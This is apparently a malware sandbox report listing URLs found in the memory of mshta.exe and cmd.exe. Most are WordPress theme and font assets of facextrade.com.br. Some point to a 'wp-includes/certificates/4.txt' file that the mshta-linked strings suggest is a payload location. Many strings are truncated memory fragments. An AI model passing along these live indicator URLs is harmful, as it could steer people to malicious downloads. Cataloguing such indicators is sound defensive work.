Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;
Source: mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1178363026.0000000006479000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0-US
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.00C;
Source: mshta.exe, 00000008.00000002.1178363026.0000000006479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.019
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0er=2.6.00.9.3cte
Source: mshta.exe, 00000008.00000003.1036123711.0000000003805000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170700641.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0http://facextrad
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.0)
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.00E)
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0r=1.0iJ
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css...
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20ive.css.NET4.0E)
Source: mshta.exe, 00000008.00000002.1168863988.0000000003149000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1062963416.0000000003148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFrameworkhttp://facextrade.com.br/wp-content/themes
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css_
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.css
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssS
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.csss
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165801829.00000000003A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg)
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg);
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg4
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpgF
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpgg
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0.js?ver=5.0.3
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.01.0
Source: mshta.exe, 00000008.00000002.1170182670.0000000003727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0C:
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0r=1.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0ver=1.0.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0ver=5.0.3yT
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0B/
Source: mshta.exe, 00000008.00000002.1168275161.0000000002C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0http://facextrade.c
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0r
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3n.js?ver=1
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0.NET4.0E).(
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.00C;
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.02C:
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0S
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0a
Source: mshta.exe, 00000008.00000003.1036123711.0000000003805000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170700641.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0http://facextrade.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0n.css))T
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css
Source: mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.css.css?ver=4.9.204.9.201.2.8.124Qi
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/main-style.csss
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.css
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.cssa.cssS
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.csslY
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/theme51253/style.csssY
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes=JW&n?H4~b
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizont
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontPX
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png4.0E)
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-include
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4
Source: mshta.exe, 00000008.00000002.1165801829.00000000003A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166096675.0000000002240000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1183079805.0000000008EA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#top=V
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt#topeV
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt.(
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt.3Z
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt.6.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt1
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txt=2.3.0
Source: cmd.exe, 00000002.00000002.1165242913.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtAWinSta0
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtJH
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtK
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtMV
Source: mshta.exe, 00000008.00000002.1165602008.0000000000320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtWinSta0
Source: mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txthttp://facextrade.com.br/wp-includes/certific
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtlt.aspx?ocid=ie6_countdown_bannercode
Source: mshta.exe, 00000008.00000002.1165602008.0000000000320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtmshta
Source: mshta.exe, 00000008.00000002.1183079805.0000000008EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtnp6
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtogleTranslateElementInit2min.js?ver=2.3.0nu-i
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txts.0
Source: cmd.exe, 00000002.00000002.1165242913.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtsmshta
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txtt
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/4.txty-policy
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/:
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/GZ
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/privacy-policy
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/privacy-policyflate
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/s
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/sIK
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/certificates/t-lazy-sr
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204172.1
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417igrate-1.2.1.min.js?ver=1.2.1=1
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417u
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20M
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20Time.js?ver=1.08
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20a.min.js?ver=1.3.4=1.0
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20e
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.947478539.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.947502110.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.947431861.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.947401375.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167979346.0000000002C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201.0
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.201A
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.202.1b
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20F$
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20Lh
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20R$
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20css
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20jh
Source: mshta.exe, 00000008.00000002.1185019487.0000000009AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20ou
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/wlwmanifest.xml
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-includes/wlwmanifest.xmlxt
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/xmlrpc.php
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://fontawesome.io
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://fontawesome.io.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/A
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/F
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato&subset=latin
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato&subset=latink/css/magnific-popup.css?ver=0.9.3public.css
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100
Source: mshta.exe, 00000008.00000002.1165801829.00000000003A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:100s/4.txtCe
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:300-release.min.js?ver=4.9.20
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:3001
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:4004.txt
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:400er=1.249
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174889739.0000000005179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:700
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:7004.txt:
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:900
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:9004.txt
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Lato:900ity:
